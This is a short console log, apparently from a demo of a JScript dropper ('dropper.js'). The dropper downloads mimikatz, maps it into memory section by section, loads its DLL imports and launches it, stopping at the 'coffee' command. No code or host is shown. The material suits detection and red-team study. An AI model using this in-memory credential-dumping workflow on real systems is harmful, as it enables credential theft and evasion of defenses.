Experimental
C:\Users\research\Documents>cscript.exe dropper.js
Microsoft (R) Windows Script Host Version 5.8
Copyright (C) Microsoft Corporation. All rights reserved.
x64/mimikatz.exe
Downloaded Latest
Preferred Load Address = 140000000
Allocated Space For DF000 at 2DE0000
Section .text , Copied To 2DE1000
Section .rdata , Copied To 2E65000
Section .data , Copied To 2EAD000
Section .pdata , Copied To 2EB4000
Section .rsrc , Copied To 2EB9000
Section .reloc , Copied To 2EBD000
Delta = FFFFFFFEC2DE0000
Loaded ADVAPI32.dll
Loaded Cabinet.dll
Loaded CRYPT32.dll
Loaded cryptdll.dll
Loaded FLTLIB.DLL
Loaded NETAPI32.dll
Loaded ole32.dll
Loaded OLEAUT32.dll
Loaded RPCRT4.dll
Loaded SHLWAPI.dll
Loaded SAMLIB.dll
Loaded Secur32.dll
Loaded SHELL32.dll
Loaded USER32.dll
Loaded USERENV.dll
Loaded VERSION.dll
Loaded HID.DLL
Loaded SETUPAPI.dll
Loaded WinSCard.dll
Loaded WINSTA.dll
Loaded WLDAP32.dll
Loaded advapi32.dll
Loaded msasn1.dll
Loaded ntdll.dll
Loaded netapi32.dll
Loaded KERNEL32.dll
Loaded msvcrt.dll
Executing Mimikatz
.#####. mimikatz 2.1.1 (x64) built on Jun 16 2018 18:49:05 - lil!
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(commandline) #
mimikatz #
mimikatz # coffee
( (
) )
.______.
| |]
\ /
`----'
# Boom!